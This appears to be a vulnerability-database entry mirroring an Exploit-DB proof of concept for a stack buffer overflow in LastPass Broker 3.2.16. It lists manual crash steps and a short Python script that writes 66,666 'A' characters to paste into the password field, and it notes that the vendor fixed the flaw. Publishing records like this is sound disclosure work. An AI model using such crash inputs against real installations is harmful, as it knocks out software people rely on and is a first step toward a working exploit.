Last PassBroker 3.2.16 - Stack Buffer Overflow (PoC)

Vulnerability ID 1066480 Vulnerability type
Published 2015-10-06 Updated 2015-10-06
CVE ID N/A CNNVD-ID N/A
Platform Windows CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/38405
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
'''
********************************************************************************************
# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link: https://lastpass.com/download
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Open 'LastPassBroker.exe'.
2- An input box will appear asking for Email and Password.
   In the password field, paste in the contents of crash.txt.
3- Hit Login.
~Software will crash.

[Code to produce crash.txt]: 
'''
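# 66666 "A" characters: the oversized input for the password field
junk = "A" * 66666
# Write the input to CRASH.txt; the with-block closes the file on exit
with open("CRASH.txt", "w") as f:
    f.write(junk)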

'''
> Vendor Notified, Fixed in latest Release.
**********************************************************************************************
'''